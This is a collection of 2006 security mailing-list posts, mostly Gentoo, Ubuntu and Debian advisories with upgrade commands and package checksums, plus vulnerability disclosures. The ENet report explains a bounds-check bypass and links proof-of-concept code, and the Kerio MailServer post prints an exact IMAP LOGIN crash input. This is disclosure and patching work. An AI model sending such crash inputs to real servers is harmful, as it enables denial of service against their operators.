[ GLSA 200603-09 ] SquirrelMail: Cross-site scripting and IMAP command injection
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200603-09 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Low Title: SquirrelMail: Cross-site scripting and IMAP command injection Date: March 12, 2006 Bugs: #123781 ID: 200603-09 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis SquirrelMail is vulnerable to several cross-site scripting vulnerabilities and IMAP command injection. Background == SquirrelMail is a webmail package written in PHP. It supports IMAP and SMTP protocols. Affected packages = --- Package / Vulnerable / Unaffected --- 1 mail-client/squirrelmail1.4.6 = 1.4.6 Description === SquirrelMail does not validate the right_frame parameter in webmail.php, possibly allowing frame replacement or cross-site scripting (CVE-2006-0188). Martijn Brinkers and Scott Hughes discovered that MagicHTML fails to handle certain input correctly, potentially leading to cross-site scripting (only Internet Explorer, CVE-2006-0195). Vicente Aguilera reported that the sqimap_mailbox_select function did not strip newlines from the mailbox or subject parameter, possibly allowing IMAP command injection (CVE-2006-0377). Impact == By exploiting the cross-site scripting vulnerabilities, an attacker can execute arbitrary scripts running in the context of the victim's browser. This could lead to a compromise of the user's webmail account, cookie theft, etc. A remote attacker could exploit the IMAP command injection to execute arbitrary IMAP commands on the configured IMAP server. Workaround == There is no known workaround at this time. Resolution == All SquirrelMail users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =mail-client/squirrelmail-1.4.6 Note: Users with the vhosts USE flag set should manually use webapp-config to finalize the update. References == [ 1 ] CVE-2006-0188 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0188 [ 2 ] CVE-2006-0195 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0195 [ 3 ] CVE-2006-0377 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0377 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200603-09.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2006 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.0 pgpGRsxhhFLFL.pgp Description: PGP signature
[ GLSA 200603-10 ] Cube: Multiple vulnerabilities
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200603-10 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: Cube: Multiple vulnerabilities Date: March 13, 2006 Bugs: #125289 ID: 200603-10 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Cube is vulnerable to a buffer overflow, invalid memory access and remote client crashes, possibly leading to a Denial of Service or remote code execution. Background == Cube is an open source first person shooter game engine supporting multiplayer via LAN or internet. Affected packages = --- Package / Vulnerable / Unaffected --- 1 games-fps/cube = 20050829 Vulnerable! --- NOTE: Certain packages are still vulnerable. Users should migrate to another package if one is available or wait for the existing packages to be marked stable by their architecture maintainers. Description === Luigi Auriemma reported that Cube is vulnerable to a buffer overflow in the sgetstr() function (CVE-2006-1100) and that the sgetstr() and getint() functions fail to verify the length of the supplied argument, possibly leading to the access of invalid memory regions (CVE-2006-1101). Furthermore, he discovered that a client crashes when asked to load specially crafted mapnames (CVE-2006-1102). Impact == A remote attacker could exploit the buffer overflow to execute arbitrary code with the rights of the user running cube. An attacker could also exploit the other vulnerabilities to crash a Cube client or server, resulting in a Denial of Service. Workaround == Play solo games or restrict your multiplayer games to trusted parties. Resolution == Upstream stated that there will be no fixed version of Cube, thus the Gentoo Security Team decided to hardmask Cube for security reasons. All Cube users are encouraged to uninstall Cube: # emerge --ask --unmerge games-fps/cube References == [ 1 ] CVE-2006-1100 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1100 [ 2 ] CVE-2006-1101 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1101 [ 3 ] CVE-2006-1102 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1102 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200603-10.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2006 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.0 pgpg3Kf4qGgQa.pgp Description: PGP signature
[USN-262-1] Ubuntu 5.10 installer password disclosure
=== Ubuntu Security Notice USN-262-1 March 12, 2006 Ubuntu 5.10 installer vulnerability https://launchpad.net/bugs/34606 === A security issue affects the following Ubuntu releases: Ubuntu 5.10 (Breezy Badger) The following packages are affected: base-config passwd The problem can be corrected by upgrading the affected package to version 2.67ubuntu20 (base-config) and 1:4.0.3-37ubuntu8 (passwd). In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: Karl Øie discovered that the Ubuntu 5.10 installer failed to clean passwords in the installer log files. Since these files were world-readable, any local user could see the password of the first user account, which has full sudo privileges by default. The updated packages remove the passwords and additionally make the log files readable only by root. This does not affect the Ubuntu 4.10, 5.04, or the upcoming 6.04 installer. However, if you upgraded from Ubuntu 5.10 to the current development version of Ubuntu 6.04 ('Dapper Drake'), please ensure that you upgrade the passwd package to version 1:4.0.13-7ubuntu2 to fix the installer log files. Source archives: http://security.ubuntu.com/ubuntu/pool/main/b/base-config/base-config_2.67ubuntu20.dsc Size/MD5: 758 c22bb6e3be4d59aa93e84327f60e89ab http://security.ubuntu.com/ubuntu/pool/main/b/base-config/base-config_2.67ubuntu20.tar.gz Size/MD5: 577194 99eabbe70227169feaff28ff9062d097 http://security.ubuntu.com/ubuntu/pool/main/s/shadow/shadow_4.0.3-37ubuntu8.diff.gz Size/MD5: 1067297 9db7bb924125a5587380efc08f6787e1 http://security.ubuntu.com/ubuntu/pool/main/s/shadow/shadow_4.0.3-37ubuntu8.dsc Size/MD5: 876 50cdfae3bfbe1bb1bb4be192d7de19a7 http://security.ubuntu.com/ubuntu/pool/main/s/shadow/shadow_4.0.3.orig.tar.gz Size/MD5: 1045704 b52dfb2e5e8d9a4a2aae0ca1b266c513 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/b/base-config/apt-setup-udeb_2.67ubuntu20_all.udeb Size/MD5: 3298 dd42b2901f6f5d7525083c27cbb23407 http://security.ubuntu.com/ubuntu/pool/main/b/base-config/base-config_2.67ubuntu20_all.deb Size/MD5: 291224 e95d7a1d25074ea57d444e817cef1850 http://security.ubuntu.com/ubuntu/pool/main/s/shadow/initial-passwd-udeb_4.0.3-37ubuntu8_all.udeb Size/MD5: 1740 6c7bc8e12968d9876b6e1b27f0476484 http://security.ubuntu.com/ubuntu/pool/main/b/base-config/tzsetup-udeb_2.67ubuntu20_all.udeb Size/MD5: 2760 f6ebc84fd2bff0275b1e64d53fdc9955 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/s/shadow/login_4.0.3-37ubuntu8_amd64.deb Size/MD5: 180662 de75ded6034f0d7226dfbf0ec66e2be7 http://security.ubuntu.com/ubuntu/pool/main/s/shadow/passwd_4.0.3-37ubuntu8_amd64.deb Size/MD5: 589790 f90c48af4e1c55202f22127e72dbf45d i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/s/shadow/login_4.0.3-37ubuntu8_i386.deb Size/MD5: 171882 347fa929d15c3689bd68fc487cc116c6 http://security.ubuntu.com/ubuntu/pool/main/s/shadow/passwd_4.0.3-37ubuntu8_i386.deb Size/MD5: 515580 b8c965e4a5c40d1c50e8816aeef689bc powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/s/shadow/login_4.0.3-37ubuntu8_powerpc.deb Size/MD5: 179886 42ebfcd496b621bdab29e9a6b3f50522 http://security.ubuntu.com/ubuntu/pool/main/s/shadow/passwd_4.0.3-37ubuntu8_powerpc.deb Size/MD5: 568426 089edb3f8110ab191bba6d061b199385 signature.asc Description: Digital signature
[USN-264-1] gnupg vulnerability
=== Ubuntu Security Notice USN-264-1 March 13, 2006 gnupg vulnerability CVE-2006-0049 === A security issue affects the following Ubuntu releases: Ubuntu 4.10 (Warty Warthog) Ubuntu 5.04 (Hoary Hedgehog) Ubuntu 5.10 (Breezy Badger) The following packages are affected: gnupg The problem can be corrected by upgrading the affected package to version 1.2.4-4ubuntu2.3 (for Ubuntu 4.10), 1.2.5-3ubuntu5.3 (for Ubuntu 5.04), or 1.4.1-1ubuntu1.2 (for Ubuntu 5.10). In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: Tavis Ormandy discovered a flaw in gnupg's signature verification. In some cases, certain invalid signature formats could cause gpg to report a 'good signature' result for auxiliary unsigned data which was prepended or appended to the checked message part. Updated packages for Ubuntu 4.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.2.4-4ubuntu2.3.diff.gz Size/MD5:60031 fc55a23607cfac514084704155760cc8 http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.2.4-4ubuntu2.3.dsc Size/MD5: 621 c0d08dda5a9b2bd3f130b94784082dc5 http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.2.4.orig.tar.gz Size/MD5: 3451202 adfab529010ba55533c8e538c0b042a2 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.2.4-4ubuntu2.3_amd64.deb Size/MD5: 1722782 8556e99b322bdf18ef7bad54329410df i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.2.4-4ubuntu2.3_i386.deb Size/MD5: 1667764 410203ad10b3eb7faa56950958af powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.2.4-4ubuntu2.3_powerpc.deb Size/MD5: 1721814 c6038008b123518fbf75f8547e1619a5 Updated packages for Ubuntu 5.04: Source archives: http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.2.5-3ubuntu5.3.diff.gz Size/MD5:66069 42bba8259f5a074b89da1bb422889f1b http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.2.5-3ubuntu5.3.dsc Size/MD5: 654 5930a6888f76f726ea7076eff76f14e9 http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.2.5.orig.tar.gz Size/MD5: 3645308 9109ff94f7a502acd915a6e61d28d98a amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.2.5-3ubuntu5.3_amd64.deb Size/MD5: 805910 4d69ba91dd0d2c79b54725d1bd139923 http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gpgv-udeb_1.2.5-3ubuntu5.3_amd64.udeb Size/MD5: 146442 a603783255829e50e444e859321e0001 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.2.5-3ubuntu5.3_i386.deb Size/MD5: 750516 f8d97e8702866e76ba7b6ea5f946c4f0 http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gpgv-udeb_1.2.5-3ubuntu5.3_i386.udeb Size/MD5: 121348 1feb52e0c56d73302477a99569147519 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.2.5-3ubuntu5.3_powerpc.deb Size/MD5: 806396 36ba1f3473c45060151e8f2089261172 http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gpgv-udeb_1.2.5-3ubuntu5.3_powerpc.udeb Size/MD5: 135406 a92ce4e3384f840cf48dc50de94c9d8d Updated packages for Ubuntu 5.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.4.1-1ubuntu1.2.diff.gz Size/MD5:20510 acff054f7255a23ce8cd7595a68ca2b8 http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.4.1-1ubuntu1.2.dsc Size/MD5: 684 70749478363ef5374259a66ef5517bb7 http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.4.1.orig.tar.gz Size/MD5: 4059170 1cc77c6943baaa711222e954bbd785e5 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.4.1-1ubuntu1.2_amd64.deb Size/MD5: 1136048 31643c8b2e3cfcd8774ad17ceb5e8e0c http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gpgv-udeb_1.4.1-1ubuntu1.2_amd64.udeb Size/MD5: 152158 b7b70b5ee13b46854b9383b2a280aea0 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.4.1-1ubuntu1.2_i386.deb Size/MD5: 1044172 cdf0e85e58ba4b760741a72c5c7e6603 http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gpgv-udeb_1.4.1-1ubuntu1.2_i386.udeb Size/MD5: 130664 2719e86828d066102cade3457de20a6a powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.4.1-1ubuntu1.2_powerpc.deb Size/MD5: 1119252 208607aed4a4b0a4e27dc503e3c2147c
directory traversal Fixed in DirectContact 0.3c
Hi, This security hole is fixed in version 0.3c. The patch is automatically applied when DirectContact is restarted. Regards, Lionel Reyero
[SECURITY] [DSA 994-1] New freeciv packages fix denial of service
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 994-1 [EMAIL PROTECTED] http://www.debian.org/security/ Martin Schulze March 13th, 2006http://www.debian.org/security/faq - -- Package: freeciv Vulnerability : denial of service Problem type : remote Debian-specific: no CVE ID : CVE-2006-0047 BugTraq ID : 16975 Debian Bug : 355211 Luigi Auriemma discovered a denial of service condition in the free Civilization server that allows a remote user to trigger a server crash. The old stable distribution (woody) is not affected by this problem. For the stable distribution (sarge) this problem has been fixed in version 2.0.1-1sarge1. For the unstable distribution (sid) this problem has been fixed in version 2.0.8-1. We recommend that you upgrade your freeciv-server package. Upgrade Instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.1 alias sarge - Source archives: http://security.debian.org/pool/updates/main/f/freeciv/freeciv_2.0.1-1sarge1.dsc Size/MD5 checksum: 997 bccef322ab4d8f0587818c489599133a http://security.debian.org/pool/updates/main/f/freeciv/freeciv_2.0.1-1sarge1.diff.gz Size/MD5 checksum:44229 be1666c210b9d3e7e9161106b68abb10 http://security.debian.org/pool/updates/main/f/freeciv/freeciv_2.0.1.orig.tar.gz Size/MD5 checksum: 11086541 2deea98d258138325f590ec52d530a96 Architecture independent components: http://security.debian.org/pool/updates/main/f/freeciv/freeciv-data_2.0.1-1sarge1_all.deb Size/MD5 checksum: 3843498 fc7fd56c3c37efc8489be7880f5d2384 http://security.debian.org/pool/updates/main/f/freeciv/freeciv-gtk_2.0.1-1sarge1_all.deb Size/MD5 checksum:11368 7edc101b169b712d3be5dc5433dc4bbb http://security.debian.org/pool/updates/main/f/freeciv/freeciv-xaw3d_2.0.1-1sarge1_all.deb Size/MD5 checksum:11372 d5d9e78a83c5a5d534d56a0ffc393acf http://security.debian.org/pool/updates/main/f/freeciv/freeciv_2.0.1-1sarge1_all.deb Size/MD5 checksum:11360 7d948bf16bc697808e805e46211b4e08 Alpha architecture: http://security.debian.org/pool/updates/main/f/freeciv/freeciv-client-gtk_2.0.1-1sarge1_alpha.deb Size/MD5 checksum: 590368 f9d6ab21f6341eaf0e3dacf87b59ad32 http://security.debian.org/pool/updates/main/f/freeciv/freeciv-client-xaw3d_2.0.1-1sarge1_alpha.deb Size/MD5 checksum: 514694 a6e39f77c6951b97b9befbec19d892bf http://security.debian.org/pool/updates/main/f/freeciv/freeciv-server_2.0.1-1sarge1_alpha.deb Size/MD5 checksum: 591244 4c331477f15855f6eb488ac47ebd0c38 AMD64 architecture: http://security.debian.org/pool/updates/main/f/freeciv/freeciv-client-gtk_2.0.1-1sarge1_amd64.deb Size/MD5 checksum: 476454 fbdb18b936d0cec1c3722162e8bd964a http://security.debian.org/pool/updates/main/f/freeciv/freeciv-client-xaw3d_2.0.1-1sarge1_amd64.deb Size/MD5 checksum: 409102 7f2fa87b7ffd9ff84a85a35b3d82dc07 http://security.debian.org/pool/updates/main/f/freeciv/freeciv-server_2.0.1-1sarge1_amd64.deb Size/MD5 checksum: 465942 480cb2efba03369e28b77647841859e9 ARM architecture: http://security.debian.org/pool/updates/main/f/freeciv/freeciv-client-gtk_2.0.1-1sarge1_arm.deb Size/MD5 checksum: 423194 0f7e6820a48890e8e82669ff0bbd4422 http://security.debian.org/pool/updates/main/f/freeciv/freeciv-client-xaw3d_2.0.1-1sarge1_arm.deb Size/MD5 checksum: 361728 7eb46efcc7bcc3f3a56c3a283dad1f97 http://security.debian.org/pool/updates/main/f/freeciv/freeciv-server_2.0.1-1sarge1_arm.deb Size/MD5 checksum: 419804 d9eb16ebbd1a601f2dbcf1bd03982316 Intel IA-32 architecture: http://security.debian.org/pool/updates/main/f/freeciv/freeciv-client-gtk_2.0.1-1sarge1_i386.deb Size/MD5 checksum: 440936 6c2ff70b8d5980f30662ee1ed23c6a59 http://security.debian.org/pool/updates/main/f/freeciv/freeciv-client-xaw3d_2.0.1-1sarge1_i386.deb Size/MD5 checksum: 366828 909f29a8fadf9241525f71c0f3e7c59f http://security.debian.org/pool/updates/main/f/freeciv/freeciv-server_2.0.1-1sarge1_i386.deb Size/MD5 checksum: 430250 3a04f91ae1487a9b9624045426a54247 Intel IA-64 architecture:
Multiple vulnerabilities in ENet library (Jul 2005)
### Luigi Auriemma Application: ENet library http://enet.bespin.org Versions: = Jul 2005 (it's the current CVS version) Platforms:Windows, *nix, *BSD and more Bugs: A] invalid memory access (32 bit) B] allocation abort with fragment Exploitation: remote Date: 12 Mar 2006 Author: Luigi Auriemma e-mail: [EMAIL PROTECTED] web:http://aluigi.altervista.org ### 1) Introduction 2) Bugs 3) The Code 4) Fix ### === 1) Introduction === ENet is a powerful open source library for handling UDP connections (it can be defined almost a sort of TCP over UDP). It's very used in some games and engines like Cube, Sauerbraten, Duke3d_w32 and others. ### === 2) Bugs === - A] invalid memory access (32 bit) - ENet uses 32 bit numbers for almost all the parameters in its packets, like fragments offset, data size, timestamps, challenge numbers and so on. Each packet received by the library (enet_host_service) is handled by the enet_protocol_handle_incoming_commands function. This function uses a pointer (currentData) which points to the current command, each packet can contain one or more commands which describe operations like a connection request, an acknowledge, a fragment, a message and more. The instruction which checks this pointer to avoid that it points over the received packet can be eluded through a big (negative on 32 bit CPU) header.commandLength parameter. After having bypassed the check currentData will point to an invalid zone of the memory and when the cycle will continue on the subsequent command (commandCount must be major than one) the application will crash. 64 bit CPUs should be not vulnerable. From enet_protocol_handle_incoming_commands in protocol.c: ... currentData = host - receivedData + sizeof (ENetProtocolHeader); while (commandCount 0 currentData host - receivedData [host - receivedDataLength]) { command = (ENetProtocol *) currentData; if (currentData + sizeof (ENetProtocolCommandHeader) host - receivedData [host - receivedDataLength]) return 0; command - header.commandLength = ENET_NET_TO_HOST_32 (command - header.commandLength); if (currentData + command - header.commandLength host - receivedData [host - receivedDataLength]) return 0; -- commandCount; currentData += command - header.commandLength; ... - B] allocation abort with fragment - ENet supports also the handling of fragments used to build the messages bigger than the receiver's MTU. When a fragment is received the library allocates the total message size in memory so it can easily rebuild all the subsequent fragments in this buffer. If the total data size specified by the attacker cannot be allocated, the library calls abort() and all the program terminates. From enet_protocol_handle_send_fragment in protocol.c: ... startCommand = enet_peer_queue_incoming_command (peer, hostCommand, enet_packet_create (NULL, totalLength, ENET_PACKET_FLAG_RELIABLE), fragmentCount); ### === 3) The Code === http://aluigi.altervista.org/poc/enetx.zip ### == 4) Fix == No fix. No reply from the developers. ### --- Luigi Auriemma http://aluigi.altervista.org
[SECURITY] [DSA 995-1] New metamail packages fix arbitrary code execution
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 995-1 [EMAIL PROTECTED] http://www.debian.org/security/ Steve Kemp March 13th, 2006http://www.debian.org/security/faq - -- Package: metamail Vulnerability : buffer overflow Problem type : remote Debian-specific: no CVE ID : CVE-2006-0709 BugTraq ID : 16611 Debian Bug : 352482 Ulf Harnhammar discoverd a buffer overflow in metamail, an implementation of MIME (Multi-purpose Internet Mail Extensions), that could lead to a denial of service or potentially execute arbitrary code when processing messages. For the old stable distribution (woody) this problem has been fixed in version 2.7-45woody.4. For the stable distribution (sarge) this problem has been fixed in version 2.7-47sarge1. For the unstable distribution (sid) this problem has been fixed in version 2.7-51. We recommend that you upgrade your metamail package. Upgrade Instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.0 alias woody - Source archives: http://security.debian.org/pool/updates/main/m/metamail/metamail_2.7-45woody.4.dsc Size/MD5 checksum: 613 6ee8aeff0f14e5d799a670fe727039c7 http://security.debian.org/pool/updates/main/m/metamail/metamail_2.7-45woody.4.diff.gz Size/MD5 checksum: 333628 22588d5a91f53fdc1a6458c5519d2512 http://security.debian.org/pool/updates/main/m/metamail/metamail_2.7.orig.tar.gz Size/MD5 checksum: 156656 c6967e9bc5d3c919764b02df24efca01 Alpha architecture: http://security.debian.org/pool/updates/main/m/metamail/metamail_2.7-45woody.4_alpha.deb Size/MD5 checksum: 166084 a45a36ff283de7cb3ab3e43694f90c45 ARM architecture: http://security.debian.org/pool/updates/main/m/metamail/metamail_2.7-45woody.4_arm.deb Size/MD5 checksum: 153404 52e740cb6dbc32c860da10010bb90571 Intel IA-32 architecture: http://security.debian.org/pool/updates/main/m/metamail/metamail_2.7-45woody.4_i386.deb Size/MD5 checksum: 150578 4d3e962558adfd7f43859b9f7fd30450 Intel IA-64 architecture: http://security.debian.org/pool/updates/main/m/metamail/metamail_2.7-45woody.4_ia64.deb Size/MD5 checksum: 205790 1e9d9f11ca4fbb1863db2e205d808c23 HP Precision architecture: http://security.debian.org/pool/updates/main/m/metamail/metamail_2.7-45woody.4_hppa.deb Size/MD5 checksum: 153406 7897b81f6f0ee82abbcf415e258d8c9d Motorola 680x0 architecture: http://security.debian.org/pool/updates/main/m/metamail/metamail_2.7-45woody.4_m68k.deb Size/MD5 checksum: 146400 a3cc53e414d0e60e54e4ac92849b4d0d Big endian MIPS architecture: http://security.debian.org/pool/updates/main/m/metamail/metamail_2.7-45woody.4_mips.deb Size/MD5 checksum: 158558 82cd3b0bb263e24f0a6f7c500a01d0af Little endian MIPS architecture: http://security.debian.org/pool/updates/main/m/metamail/metamail_2.7-45woody.4_mipsel.deb Size/MD5 checksum: 158562 b0a037641e1fa292decffa319cf75daf PowerPC architecture: http://security.debian.org/pool/updates/main/m/metamail/metamail_2.7-45woody.4_powerpc.deb Size/MD5 checksum: 148694 f326ccce8fd7cf2445e0f716fcc65143 IBM S/390 architecture: http://security.debian.org/pool/updates/main/m/metamail/metamail_2.7-45woody.4_s390.deb Size/MD5 checksum: 151512 ad0e4e1d1ee73ac300e4f1dc07bcfb5d Sun Sparc architecture: http://security.debian.org/pool/updates/main/m/metamail/metamail_2.7-45woody.4_sparc.deb Size/MD5 checksum: 155492 cf37f006621cbff83fb236afd8bfc223 Debian GNU/Linux 3.1 alias sarge - Source archives: http://security.debian.org/pool/updates/main/m/metamail/metamail_2.7-47sarge1.dsc Size/MD5 checksum: 594 3131f64cf684d62318636b8589acbc94 http://security.debian.org/pool/updates/main/m/metamail/metamail_2.7-47sarge1.diff.gz Size/MD5 checksum: 340408 165af1d9cff83f10103ebddfdb90f2ad http://security.debian.org/pool/updates/main/m/metamail/metamail_2.7.orig.tar.gz Size/MD5 checksum: 156656 c6967e9bc5d3c919764b02df24efca01 Alpha architecture: http://security.debian.org/pool/updates/main/m/metamail/metamail_2.7-47sarge1_alpha.deb Size/MD5 checksum: 168190
Kerio MailServer bugfun
Hi, It should be noted that ProtoVer Sample IMAP testsuite has been released with 3 unpublished bugs. Now it looks like that Kerio MailServer preauth bug has been fixed. Kerio MailServer 6.1.3 changelog: Version 6.1.3 Patch 1 - March 9, 2006 - Fixed possible crash when handling special crafted IMAP LOGIN command. The bug itself is really simple: $ ls PROTOVER_SAMPLE_IMAP-1.0/audit/ iaemailserver-5.3.4 keriomailserver-6.1.2 merak-8.3.0 $ cat PROTOVER_SAMPLE_IMAP-1.0/audit/keriomailserver-6.1.2 a001 LOGIN {4294967294} LITERAL TOKEN a002 LOGOUT Regards, Evgeny Legerov www.gleg.net
[SECURITY] [DSA 993-2] New GnuPG packages fix broken signature check
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 993-2 [EMAIL PROTECTED] http://www.debian.org/security/ Martin Schulze March 13th, 2006http://www.debian.org/security/faq - -- Package: gnupg Vulnerability : programming error Problem type : remote Debian-specific: no CVE ID : CVE-2006-0049 Tavis Ormandy noticed that gnupg, the GNU privacy guard - a free PGP replacement, can be tricked to emit a good signature status message when a valid signature is included which does not belong to the data packet. This update basically adds fixed packages for woody whose version turned out to be vulnerable as well. For the old stable distribution (woody) this problem has been fixed in version 1.0.6-4woody5. For the stable distribution (sarge) this problem has been fixed in version 1.4.1-1.sarge3. For the unstable distribution (sid) this problem has been fixed in version 1.4.2.2-1. We recommend that you upgrade your gnupg package. Upgrade Instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.0 alias woody - Source archives: http://security.debian.org/pool/updates/main/g/gnupg/gnupg_1.0.6-4woody5.dsc Size/MD5 checksum: 579 b34d5a5996b358e713e2e8bb71dc6404 http://security.debian.org/pool/updates/main/g/gnupg/gnupg_1.0.6-4woody5.diff.gz Size/MD5 checksum: 7866 5e36a3c06fae2b3d96a9db65988fffbd http://security.debian.org/pool/updates/main/g/gnupg/gnupg_1.0.6.orig.tar.gz Size/MD5 checksum: 1941676 7c319a9e5e70ad9bc3bf0d7b5008a508 Alpha architecture: http://security.debian.org/pool/updates/main/g/gnupg/gnupg_1.0.6-4woody5_alpha.deb Size/MD5 checksum: 1150716 ff72280db81dbc60041cd91a0d307ee6 ARM architecture: http://security.debian.org/pool/updates/main/g/gnupg/gnupg_1.0.6-4woody5_arm.deb Size/MD5 checksum: 987194 1ca0bbdaaec049b128996cdd9f776834 Intel IA-32 architecture: http://security.debian.org/pool/updates/main/g/gnupg/gnupg_1.0.6-4woody5_i386.deb Size/MD5 checksum: 966800 52e985fbb5e9bcd7baa320c549b7b70c Intel IA-64 architecture: http://security.debian.org/pool/updates/main/g/gnupg/gnupg_1.0.6-4woody5_ia64.deb Size/MD5 checksum: 1271958 27317f852e24ce3784ec62aec0860c6a HP Precision architecture: http://security.debian.org/pool/updates/main/g/gnupg/gnupg_1.0.6-4woody5_hppa.deb Size/MD5 checksum: 1059666 5b73bdfab02c7c8184b58db2c3e0b240 Motorola 680x0 architecture: http://security.debian.org/pool/updates/main/g/gnupg/gnupg_1.0.6-4woody5_m68k.deb Size/MD5 checksum: 942614 c15e8b65687c52530e48665669dde8c3 Big endian MIPS architecture: http://security.debian.org/pool/updates/main/g/gnupg/gnupg_1.0.6-4woody5_mips.deb Size/MD5 checksum: 1035974 ce95aa0adb6060fc68119c4df3492293 Little endian MIPS architecture: http://security.debian.org/pool/updates/main/g/gnupg/gnupg_1.0.6-4woody5_mipsel.deb Size/MD5 checksum: 1036400 f40b42f381d7f04004f219c16de542fc PowerPC architecture: http://security.debian.org/pool/updates/main/g/gnupg/gnupg_1.0.6-4woody5_powerpc.deb Size/MD5 checksum: 1009720 8b0372d551b48829ce6be7d0f69f6559 IBM S/390 architecture: http://security.debian.org/pool/updates/main/g/gnupg/gnupg_1.0.6-4woody5_s390.deb Size/MD5 checksum: 1002210 deef79ef16b8f5bac2b32f912caac46c Sun Sparc architecture: http://security.debian.org/pool/updates/main/g/gnupg/gnupg_1.0.6-4woody5_sparc.deb Size/MD5 checksum: 1003974 2bf876aa4b6a50cb3aadb7ef2e233f69 Debian GNU/Linux 3.1 alias sarge - Source archives: http://security.debian.org/pool/updates/main/g/gnupg/gnupg_1.4.1-1.sarge3.dsc Size/MD5 checksum: 680 8f2f1848dcdfe9d143d8e9352ef918ca http://security.debian.org/pool/updates/main/g/gnupg/gnupg_1.4.1-1.sarge3.diff.gz Size/MD5 checksum:19639 9ffb89fa0a770568ddd80a11e3eada78 